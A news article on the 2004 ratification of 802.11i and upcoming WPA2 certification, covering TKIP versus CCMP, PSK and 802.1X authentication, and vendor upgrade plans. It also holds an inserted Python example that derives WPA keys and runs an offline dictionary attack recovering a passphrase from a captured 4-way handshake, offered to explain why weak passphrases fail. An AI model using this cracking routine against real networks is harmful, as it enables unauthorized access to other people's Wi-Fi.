Would-be WEP crackers can pack their bags and go home. The long-awaited 802.11i standard WLAN enhancement for Robust
Security Networks (RSNs) has finally arrived, coming to a store near you this September.
On June 30, 2004, the IEEE formally ratified this standard amendment, applicable to 802.11a, b, and g WLANs. According to Frank Hanzlik, Managing Director of the Wi-Fi Alliance, preliminary testing of products that incorporate 802.11i is well underway.
"We go through multiple rounds of plug fests, which is what we call our interoperability tests," said Hanzlik. "We just completed one recently and, based on those results, it looks like we'll be good to go to start certifying products in early September." Products that pass these new tests, extensions of the existing Wi-Fi Protected Access (WPA) program, will wear the brand WPA2.
WPA vs. WPA2
WPA uses the same RC4 cipher as WEP, but in a more secure fashion. In WPA, the Temporal Key Integrity Protocol (TKIP) wraps RC4 with per-packet key mixing and a packet sequence counter, so the key-recovery and replay attacks that broke WEP no longer apply, and a Message Integrity Check (MIC, the "Michael" algorithm) prevents undetected modification of frames. This approach, designed so that legacy equipment can be upgraded in firmware, is an option in the final 802.11i standard.
WPA2 adds the Advanced Encryption Standard (AES), a stronger block cipher that newer hardware accelerates. WPA2 employs AES in Counter mode with CBC-MAC (CCM), creating a new encapsulation protocol, CCMP, which provides confidentiality, integrity and replay protection with a single key. Devices are Robust Security Network association (RSNA) capable if they implement CCMP or TKIP, although CCMP is required for full compliance with the 802.11i standard.
WPA supports only Infrastructure mode: WLANs composed of stations communicating through an Access Point (AP). WPA2 adds support for Ad Hoc mode: stations communicating with each other as peers.
This difference is due to authentication and key management. In WPA, a 4-way handshake proves that the station and the AP both hold the same Pairwise Master Key (PMK) and derives from it the dynamic crypto keys that actually protect traffic. The PMK itself can come from one of two sources:
- WPA-Personal uses a group passphrase, or Preshared Key (PSK), as its PMK. Any station with the passphrase can join the WLAN. Because the passphrase (8 to 63 characters) is stretched into the PMK using only the network's SSID, anyone who captures a single handshake can test guesses offline, so the PSK should be long (12+ characters), not a dictionary word, and protected like any password.
- WPA-Enterprise starts with an individual user's identity and goes through a lengthy 802.1X Port Access Control and Extensible Authentication Protocol (EAP) exchange. Individual authentication is better for businesses, but requires complex infrastructure, including a RADIUS server, a user database or certificate authority, and a safe, cost-effective way to distribute user credentials.
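The key hierarchy behind the two alternatives above, as an added example that is not part of the original article: the passphrase-to-PSK stretching used by WPA-Personal, the derivation of the Pairwise Transient Key (PTK) that both sides compute during the 4-way handshake, and the reason a weak passphrase is dangerous. The AP and station addresses, nonces and EAPOL-Key frame below are constructed for the example; only the PBKDF2 and PRF constructions are the standard's own.

```python
import hashlib
import hmac

# Added example; not code from the article or from any vendor it quotes.
# Implements the 802.11i PSK and PTK derivations and then runs the offline
# guessing attack that a captured 4-way handshake makes possible.


def wpa_psk(passphrase: str, ssid: str) -> bytes:
    """WPA-Personal: the 256-bit PSK (used directly as the PMK) from a passphrase.

    802.11i specifies PBKDF2-HMAC-SHA1 with the SSID as salt and 4096 rounds.
    """
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8..63 ASCII characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               ssid.encode("utf-8"), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK from the PMK, both MAC addresses and the two handshake nonces.

    The min/max ordering makes the result the same whichever side computes it.
    """
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)   # 48 bytes for CCMP
    return {"kck": ptk[:16],    # Key Confirmation Key: authenticates EAPOL-Key frames
            "kek": ptk[16:32],  # Key Encryption Key: wraps the group key (GTK)
            "tk": ptk[32:48]}   # Temporal Key: the CCMP data-encryption key


def eapol_key_mic(kck: bytes, frame_with_zero_mic: bytes) -> bytes:
    """EAPOL-Key MIC for the AES key descriptor: HMAC-SHA1 truncated to 128 bits."""
    return hmac.new(kck, frame_with_zero_mic, hashlib.sha1).digest()[:16]


def crack_passphrase(ssid, aa, spa, anonce, snonce, msg2_zero_mic, captured_mic, wordlist):
    """Offline dictionary attack using only values visible in a sniffed handshake."""
    for guess in wordlist:
        ptk = derive_ptk(wpa_psk(guess, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_key_mic(ptk["kck"], msg2_zero_mic), captured_mic):
            return guess
    return None


# Constructed sample handshake: every value below is made up for this example.
SSID = "IEEE"
AA = bytes.fromhex("001122334455")    # AP (authenticator) MAC address
SPA = bytes.fromhex("66778899aabb")   # station (supplicant) MAC address
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Stand-in for handshake message 2 with its 16-byte MIC field zeroed, as the
# verifier (and the attacker) must do before recomputing the MIC.
MSG2 = b"\x02\x03\x00\x75" + bytes(30) + SNONCE + bytes(32) + bytes(16) + bytes(2)


def demo() -> str:
    """The network uses the passphrase 'password'; the attacker recovers it."""
    victim_kck = derive_ptk(wpa_psk("password", SSID), AA, SPA, ANONCE, SNONCE)["kck"]
    captured_mic = eapol_key_mic(victim_kck, MSG2)
    return crack_passphrase(SSID, AA, SPA, ANONCE, SNONCE, MSG2, captured_mic,
                            ["letmein1", "wireless", "password", "correct horse"])


if __name__ == "__main__":
    print("PSK for 'password'/'IEEE':", wpa_psk("password", SSID).hex())
    print("recovered passphrase:", demo())
```

Each guess costs 4096 HMAC-SHA1 rounds, which slows an attacker down but does not stop one: the SSID is the only salt, so a common SSID plus a dictionary passphrase falls to precomputation, which is why the article's advice to pick a long, non-dictionary PSK matters. WPA-Enterprise avoids the problem entirely because the PMK comes out of the EAP exchange and is different for every session.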
The final 802.11i standard (and therefore WPA2) extends this handshake so that either method can be used in a peer-to-peer environment. Better yet, 802.11i/WPA2 adds PMK caching and pre-authentication to reduce the delay caused by 802.1X.
After a station has completed full authentication, it may use a cached PMK to skip re-authentication when roaming between APs. Stations can also initiate pre-authentication with a new AP when roaming appears likely. According to Trapeze Networks, caching slashes handoff from 800 ms to as little as 25 ms. This is very important to delay-sensitive applications like VoIP over Wi-Fi.
According to Hanzlik, products should be announced in September, at the start of certification. "We start about six months before the certification program is done, going through repeated interoperability tests to work out the kinks in our test bed. That's why we can say with good confidence that the first batch of products will show up around the same time as certification starts." The WPA2 test bed includes a mixture of end products and platforms (chips used in such products).
I queried vendors regarding their plans for 802.11i support and WPA2 certification. Several (3COM, Apple, Buffalo) declined to comment before making formal product announcements. But others offered comments that suggest aggressive plans for rapid support. For example:
- SMC spokesperson Betty Chan said, "Most of SMC's 802.11g and 802.11a/g products will be upgradeable with 802.11i by September. All new products will include 802.11i."
- Melody Chalaban, Public Relations Manager, Belkin Corporation, said "Broadcom is already rolling 802.11i into their driver software. We are beginning the implementation in our drivers and software. We will be able to upgrade end users via firmware and software around [September, when WPA2 certification starts]."
- Linda Horiuchi, PR manager for wireless/mobility, said that Cisco plans to support IEEE 802.11i in Cisco Aironet products. "As an example, the IEEE 802.11g radios for existing Cisco Aironet 1200 and 1100 Series Access Points and Aironet 1300 Series Outdoor AP and Wireless Bridge have hardware accelerators for AES, so 802.11i will be a software upgrade available in Q4," wrote Horiuchi.
- Jenni Adair, Director of Public Relations at Trapeze Networks, said, "We already support in shipping product all of the major security sub-components including WPA/TKIP and WPA2/AES. We will have full 802.11i compliance in Q4 of this year which will entail a simple software upgrade."
- Carl Blume, Director of Product Marketing, said that Colubris Networks will roll out 802.11i and WPA2 across its entire line of a/b/g products in Q4. Those products, introduced in January 2004, already support AES encryption. "All [are] software upgradeable to 802.11i and WPA2. Precise availability dates will vary by product and certification schedules in the Wi-Fi Alliance testing labs," said Blume. Customers with service subscriptions will download new software from Colubris.
- Airespace's Jeff Aaron told me that his company's products already support the 802.11i standard. "We are on track to be [among] the first vendors to complete official Wi-Fi Alliance certification for 802.11i," said Aaron. "802.11i comes standard with our latest software release, which has just begun shipping to customers. There is no cost to upgrade to this software version."
Preparing to upgrade
There's also a difference between 802.11i support and WPA2 certification. Draft 10 of 802.11i has been available since April, giving many vendors time to implement and test prior to formal IEEE ratification. However, products can comply with a standard and still encounter interoperability issues in the field.
"We see standards compliance as necessary but not sufficient. If that wasn't true, we'd be doing certification right now," said Hanzlik. "We're still wrapping up interoperability issues found during earlier plug fests. That suggests to us that there were issues in earlier products that need to be addressed." Products that include 802.11i today may still have interoperability issues that will be detected and resolved during certification testing.
Hanzlik believes that certification is more important now than ever due to increasing complexity. "Buyers developing RFPs for Wi-Fi products [should] include a checkbox for WPA2 certification to make sure the products that show up in their organizations will interoperate," advised Hanzlik. "There have been cases in the past where pre-standard implementations didn't quite work together."
Any consumer purchasing Wi-Fi products today should seek out vendors that will commit to fully supporting 802.11i and completing WPA2 certification. Whenever possible, purchase hardware that already supports AES (CCMP is computationally heavier than TKIP, so older chipsets without an AES accelerator may never receive a WPA2 upgrade), and make sure that firmware upgrades will be freely available under your warranty or support plan. Once certification starts, check the Wi-Fi Alliance Web site for a current list of WPA2 products.
Today, Wi-Fi products require WPA support. Eventually, Wi-Fi products may require WPA2 support. "With WPA, we had a strong motivation to make that technology mandatory because of concern over legacy WEP. For WPA2, there's still time to consider when we'll make it mandatory," said Hanzlik. "There are some customers that will be satisfied with WPA and others that will need WPA2. So we'll keep WPA2 as an option in the beginning and let the market decide whether to make it mandatory in the future."